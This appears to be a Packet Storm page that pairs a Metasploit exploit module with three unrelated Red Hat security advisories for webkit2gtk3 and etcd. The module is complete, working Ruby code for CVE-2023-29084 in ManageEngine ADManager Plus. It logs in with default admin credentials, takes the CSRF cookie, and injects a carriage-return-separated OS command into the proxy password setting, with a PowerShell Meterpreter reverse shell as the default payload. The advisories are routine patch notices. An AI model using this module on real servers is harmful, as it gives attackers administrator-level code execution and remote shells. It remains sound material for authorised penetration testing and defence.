    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  require 'json'  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ManageEngine ADManager Plus ChangePasswordAction Authenticated Command Injection',        'Description' => %q{          ManageEngine ADManager Plus prior to build 7181 is vulnerable to an authenticated command injection due to insufficient          validation of user input when performing the ChangePasswordAction function before passing it into a string that is later          used as an OS command to execute.          By making a POST request to /api/json/admin/saveServerSettings with a params POST          parameter containing a JSON array object that has a USERNAME or PASSWORD element containing a          carriage return and newline, followed by the command the attacker wishes to execute, an attacker can gain RCE as the user          running ADManager Plus, which will typically be the local administrator.          Note that the attacker must be authenticated in order to send requests to /api/json/admin/saveServerSettings,          so this vulnerability does require authentication to exploit.          As this exploit modifies the HTTP proxy settings for the entire server, one cannot use fetch payloads          with this exploit, since these will use HTTP connections that will be affected by the change in configuration.        },        'Author' => [          'Simon Humbert', # Disclosure of bug via ZDI          'Dinh Hoang', # Aka hnd3884. Writeup and PoC          'Grant Willcox', # Metasploit module        ],        'References' => [          ['CVE', '2023-29084'],          ['URL', 'https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/'], # Writeup          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-438/'], # ZDI Advisory          ['URL', 'https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html'], # Advisory          ['URL', 'https://www.manageengine.com/products/ad-manager/release-notes.html'] # Release Notes and Reporter Acknowledgement        ],        'DisclosureDate' => '2023-04-12',        'License' => MSF_LICENSE,        'Platform' => 'win',        'Arch' => [ARCH_CMD],        'Privileged' => true,        'Payload' => {          'BadChars' => "\x22\x0A\x0D\x00[{}]:," # Avoid double quotes, aka 0x22, and some other characters that might cause issues.        },        'Targets' => [          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Type' => :win_cmd,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' },              'Payload' => { 'Compat' => { 'ConnectionType' => 'reverse bind none' } }            }          ],        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8080        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES] # We are changing the proxy settings for every HTTP connection on the target server.        }      )    )    register_options(      [        OptString.new('USERNAME', [true, 'The user to log into ADManager Plus as', 'admin']),        OptString.new('PASSWORD', [true, 'The password to log in with', 'admin']),        OptString.new('DOMAIN', [true, 'The domain to log into', 'ADManager Plus Authentication'])      ]    )  end  def login(username, password, domain)    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'j_security_check'),      'method' => 'POST',      'vars_get' => {        'LogoutFromSSO' => 'true'      },      'vars_post' => {        'is_admp_pass_encrypted' => 'false', # Optional but better to keep it in here to match normal request.        'j_username' => username,        'j_password' => password,        'domainName' => domain,        'AUTHRULE_NAME' => 'ADAuthenticator'      },      'keep_cookies' => true    )    unless res && (res.code == 302 || res.code == 303)      fail_with(Failure::NoAccess, 'Could not log in successfully!')    end    print_good('Logged in successfully!')  end  def check    res = send_request_cgi(      'uri' => target_uri.path,      'method' => 'GET'    )    unless res && res.code == 200 && res.body      return CheckCode::Unknown('Browsing to root of website returned a non-200 or empty response!')    end    unless res.body&.match(/\.val\('ADManager Plus Authentication'\)/)      return CheckCode::Safe('Target is not running ADManager Plus!')    end    build_number = res.body&.match(/src=".+\.js\?v=(\d{4})"/)    unless build_number      return CheckCode::Unknown('Home page did not leak the build number via the ?v= parameter as expected!')    end    build_number = build_number[1]    print_good("The target is running AdManager Plus build #{build_number}!")    # Versions 7181 and later are patched, everything prior is vulnerable.    target_build = Rex::Version.new(build_number)    if target_build >= Rex::Version.new('7181')      CheckCode::Safe('Target is running a patched version of AdManager Plus!')    elsif target_build < Rex::Version.new('7181')      CheckCode::Appears('Target appears to be running a vulnerable version of AdManager Plus!')    else      CheckCode::Unknown("An unknown error occurred when trying to parse the build number: #{build_number}. Please report this error!")    end  end  def exploit    res = send_request_cgi(      'uri' => target_uri.path,      'method' => 'GET',      'keep_cookies' => true    )    unless res && res.code == 200      fail_with(Failure::UnexpectedReply, 'Home page of target did not respond with the expected 200 OK code!')    end    login(datastore['USERNAME'], datastore['PASSWORD'], datastore['DOMAIN'])    # We need to do this post login otherwise we will get errors. This also ensures we get updated    # cookies post login as these can sometimes change post login process.    res = send_request_cgi(      'uri' => target_uri.path,      'method' => 'GET',      'keep_cookies' => true    )    unless res && res.code == 200      fail_with(Failure::UnexpectedReply, 'Home page of target did not respond with the expected 200 OK code post authentication!')    end    # Check that we actually got our cookies updated post authentication and visiting the homepage.    unless res&.get_cookies&.match(/adscsrf=.*?;.*?;.*?_zcsr_tmp=.*?;/)      fail_with(Failure::UnexpectedReply, 'Target did not respond with the expected updated cookies after logging in and visiting the home page.')    end    @csrf_cookie = nil    for cookie in @cookie_jar&.cookies      if cookie.name == 'adscsrf'        @csrf_cookie = cookie.value        break      end    end    fail_with(Failure::NoAccess, 'Could not obtain adscrf cookie!') if @csrf_cookie.blank?    retrieve_original_settings    begin      modify_proxy(create_params_value_enable(payload.encoded))    ensure      modify_proxy(create_params_value_restore)    end  end  def retrieve_original_settings    res = send_request_cgi(      {        'uri' => normalize_uri(target_uri.path, 'api', 'json', 'admin', 'getServerSettings'),        'method' => 'POST',        'vars_post' => {          'adscsrf' => @csrf_cookie        },        'keep_cookies' => true      }    )    unless res && res.code == 200 && res&.body&.match(/ads_admin_notifications/)      fail_with(Failure::UnexpectedReply, 'Was unable to get the admin settings for restoration!')    end    json_body = JSON.parse(res.body)    server_details = json_body['serverDetails']    unless server_details      fail_with(Failure::UnexpectedReply, 'Was unable to retrieve the server settings!')    end    server_details.each do |elm|      next unless elm['tabId'] == 'proxy'      @original_port = elm['PORT']      @original_password = elm['PASSWORD']      @proxy_enabled = elm['ENABLE_PROXY']      @original_server_name = elm['SERVER_NAME']      @original_user_name = elm['USER_NAME']      break    end  end  def modify_proxy(params)    res = send_request_cgi(      {        'uri' => normalize_uri(target_uri.path, 'api', 'json', 'admin', 'saveServerSettings'),        'method' => 'POST',        'vars_post' => {          'adscsrf' => @csrf_cookie,          'params' => params        },        'keep_cookies' => true      }    )    if res && res.code == 200      if res.body&.match(/{"isAuthorized":false}/)        fail_with(Failure::NoAccess, 'Somehow we became unauthenticated during exploitation!')      elsif res.body&.match(/Successfully updated the following settings.*-.*Proxy Settings/)        print_warning("Settings successfully changed confirmation received before timeout occurred. Its possible the payload didn't execute!")      elsif res.body&.match(/"status":"error"/)        print_error("The payload somehow triggered an error on the target's side! Error was: #{res.body}")      else        fail_with(Failure::PayloadFailed, 'Was not able to successfully update the settings to execute the payload!')      end    elsif res.nil?      print_good('Request timed out. Its likely the payload executed successfully!')    else      fail_with(Failure::UnexpectedReply, "Target responded with a non-200 OK code to our saveServerSettings request! Code was #{res.code}")    end  end  def create_params_value_enable(cmd)    [      {        tabId: 'proxy',        ENABLE_PROXY: true,        SERVER_NAME: 'localhost', # In my experience this worked most reliably.        USER_NAME: Rex::Text.rand_text_alphanumeric(4..20).to_s,        PASSWORD: "#{Rex::Text.rand_text_alphanumeric(4..20)}\r\n#{cmd}",        PORT: datastore['RPORT'] # In my experience, setting this to the same PORT as the web server worked reliably.      }    ].to_json  end  def create_params_value_restore    [      {        tabId: 'proxy',        ENABLE_PROXY: @proxy_enabled,        SERVER_NAME: @original_server_name,        USER_NAME: @original_user_name,        PASSWORD: @original_password,        PORT: @original_port      }    ].to_json  endend

ManageEngine ADManager Plus Command Injection

Red Hat Security Advisory 2023-3432-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include out of bounds read and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:3432-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3432  
Issue date:        2023-06-05  
CVE Names:         CVE-2023-28204 CVE-2023-32373   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* webkitgtk: a use-after-free when processing maliciously crafted web  
content (CVE-2023-32373)

* webkitgtk: an out-of-bounds read when processing malicious content  
(CVE-2023-28204)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209208 - CVE-2023-28204 webkitgtk: an out-of-bounds read when processing malicious content  
2209214 - CVE-2023-32373 webkitgtk: a use-after-free when processing maliciously crafted web content

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
webkit2gtk3-2.38.5-1.el9_2.2.src.rpm

aarch64:  
webkit2gtk3-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.2.aarch64.rpm

ppc64le:  
webkit2gtk3-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.2.ppc64le.rpm

s390x:  
webkit2gtk3-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.2.s390x.rpm

x86_64:  
webkit2gtk3-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-2.38.5-1.el9_2.2.x86_64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.2.x86_64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.2.x86_64.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.2.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.2.x86_64.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.2.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.2.x86_64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.2.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28204  
https://access.redhat.com/security/cve/CVE-2023-32373  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH54RdzjgjWX9erEAQiM7A//TKXn2wpY6wdYmxPDnxde9QRSLmDWvzpQ  
0DDeU7as/ZzwMJkoDoBstFnj3r02GnkRpn5CCshiJK0uqQY/Q/4T3d+y0Co+t2lP  
6wm/v2wkpoSy3CrVIBoIrN93WTXpOWKqyNUX1e7TiPCfATtKiLQg2a9Qmcs6A7Le  
NYS5kdTYIVWsTy1WR6hcbAJozraUNXU60sW5XoViKoR5WsnsFfTXX4v06vhxnW6p  
NR6+I4FyrEtQNo2+UuSQ0eEBEmUaH11CnrNl1TzagKZm49f3nf112ef895GNgxXG  
pGthaReUfwQilgIXMqwv+ei24npA1X/t+RIpazzhUHXh9gmjiGaLMyrEuDpVAwzk  
HEd3R/B7H+lDouoSJbAJ5H0IuMyjOYUZ3Y3JBKhzMGn0ASdCLYX5zQUSzJbBWqsh  
qOU43YUQ3GyODM3qhrQkIzSicNUacYP/ysTi8Lm7nZmGTZdVvTHYO+iobfZ/cvGJ  
IjvjqwA7D0Rgp28fKVdfAw6BNEdd0fonPTZhMn1fCm45v7F6Bdc49khnASX6Scqx  
2ifRaoVupFGKg8uQ+BaYKrCcGlXfO2jj8P/41JUJfaerYMKzqG5HGR6wlplcOfxt  
eCy3c+ItcyacSYViLVq6/jB9ynrRV0gwjVPlOdV3eBgWi4JDsXMx4EQQ171g/ee1  
EnHoatQ58/E=  
=8Vmi  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3432-01

Red Hat Security Advisory 2023-3441-01 - An update for etcd is now available for Red Hat OpenStack Platform 17.0 (Wallaby).

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform 17.0 (etcd) security update  
Advisory ID:       RHSA-2023:3441-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3441  
Issue date:        2023-06-05  
CVE Names:         CVE-2021-28235 CVE-2023-32082   
=====================================================================

1. Summary:

An update for etcd is now available for Red Hat OpenStack Platform 17.0  
(Wallaby).

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 17.0 - x86_64

3. Description:

A highly-available key value store for shared configuration

Security Fix(es):

* Information discosure via debug function (CVE-2021-28235)

* Key name can be accessed via LeaseTimeToLive API (CVE-2023-32082)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2184441 - CVE-2021-28235 etcd: Information discosure via debug function  
2208131 - CVE-2023-32082 etcd: Key name can be accessed via LeaseTimeToLive API

6. Package List:

Red Hat OpenStack Platform 17.0:

Source:  
etcd-3.4.26-1.el9ost.src.rpm

x86_64:  
etcd-3.4.26-1.el9ost.x86_64.rpm  
etcd-debuginfo-3.4.26-1.el9ost.x86_64.rpm  
etcd-debugsource-3.4.26-1.el9ost.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-28235  
https://access.redhat.com/security/cve/CVE-2023-32082  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH54PNzjgjWX9erEAQgJOA/8CUtW9KAsZV6KHhG/WYlA41Dx0LyhV2Pd  
FFX9Ir0VxBrVQb+R8Vr/CE9RO/liCK4NHzy1qpUTEUkoqZOTE4I4ClfivE3CaTG/  
/f7EgJcm9fTiDTBqCpv6HUtSrFsmxJXehA7U9nIZ45NC0lCD8heZYjBwbmCxuqOQ  
oja8mdgz/ScdjCDXLaplUl3Xu7MUbQj371jxkZukuslyBHwam9wg9NfBbvYdspC0  
L3mO4u3KZ6YnvHfa31YGjmnEUIWPcimm4iVq7vwBF4o3gA331ezO2NhCHbUFWS97  
h7HxlefloGanlWko8JWZUN4NdSDHv5O4N9mLzZ1oqkNa6dFMQ7/cNFUoD6oLm7+8  
hYDguNtVV4l9od9B/nb5yeIXMPDk+bhWAQnam7WQ53vf+HWWgvwBjRPX4VB0jfTW  
9ja0TgiAsCU6SfPTmf2UHejG6NMst05z9qPKx64DMfNL+pt6h61VQo0X+/qfHQIq  
/l9nvz3BeVHZeze2uxvZN+xVnpwURpGBgm4JYB5DqEBBdWORjUqYudAPVnoUKf+K  
FcPwhsgy25kajF//iATNqnZcV6GjkbquMaZ9IEOdc4jAXXhl7mz+cSmSHsbzfm8w  
hhcx9QUtM/9/2uElky3K1A6y98xSVl2x6tmkE7Ig2DUVGy33HwwsrjWZifdARdED  
wrL3WFxoR58=  
=hzzC  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3441-01

Red Hat Security Advisory 2023-3447-01 - An update for etcd is now available for Red Hat OpenStack Platform 16.1 (Train).

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform 16.1 (etcd) security update  
Advisory ID:       RHSA-2023:3447-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3447  
Issue date:        2023-06-05  
CVE Names:         CVE-2021-28235 CVE-2022-41723   
=====================================================================

1. Summary:

An update for etcd is now available for Red Hat OpenStack Platform 16.1  
(Train).

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.1 - ppc64le, x86_64

3. Description:

A highly-available key value store for shared configuration

Security Fix(es):

* Information discosure via debug function (CVE-2021-28235)

* golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding  
(CVE-2022-41723)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2178358 - CVE-2022-41723 net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding  
2184441 - CVE-2021-28235 etcd: Information discosure via debug function

6. Package List:

Red Hat OpenStack Platform 16.1:

Source:  
etcd-3.3.23-14.el8ost.src.rpm

ppc64le:  
etcd-3.3.23-14.el8ost.ppc64le.rpm  
etcd-debuginfo-3.3.23-14.el8ost.ppc64le.rpm  
etcd-debugsource-3.3.23-14.el8ost.ppc64le.rpm

x86_64:  
etcd-3.3.23-14.el8ost.x86_64.rpm  
etcd-debuginfo-3.3.23-14.el8ost.x86_64.rpm  
etcd-debugsource-3.3.23-14.el8ost.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-28235  
https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH5399zjgjWX9erEAQi3tA/5AYgM3ZWooHZM/rl3ZqV3HyWNwz62DIOe  
r8eZFBTgND3rCgjXR63zC/e7g409rAmWYvjc02F/MJxEsGu1fXrLa9rfXfD9o5y3  
X2qBMobtX+VsvR2jnh+EYCpz597LXmvjxGiZQfrP71zjrLX+GyRHISPGT/qgrTuH  
JaWTLfAZy95HAU6Rof0sLhsHWt+9knUt5bgyT5mdgiTo+fx7DtOCBt15PBcmaC07  
wc8NOPmgVu5Y6EPLBfYAdb368WWfwOWElbaK80SuVmgRpzXu3S83EBbaklO++pAD  
RfROf/94qy+lEXp5CfK+r8CgVRfflILsC2FJ9+SJajr/BjRm3AE0ABOpFhu0g+IU  
ORB33zhnDt3+imubHtCJaJdDomftzIjpHW6FQxeZ2aBANoZnR0/sQZaHHgjxF5Bi  
VZxb6LyJeSQcN9lDIMxUaV6HHwu4k2TT00drvVM3stUfH97piGAk4uwVLOiSYITZ  
r96n+YFhBxngKM+xjhcDERRIX7kWnTZOfUu0d6xknkdLxNGptnwIE0uX2lRo4Te1  
UAV3OhB4gHH7RmPF8jfvuW/MWgc8Z/Ux23TQj3S67TWZCMndGJLRrfmM9hkI1W4o  
VOAKy4MB47PPNmhs+8/KuEjA3SOt66omJlUrhCYqXu0nFXk2llr7iCg7RSbWV77P  
YyfgVWZYfMY=  
=nW9a  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm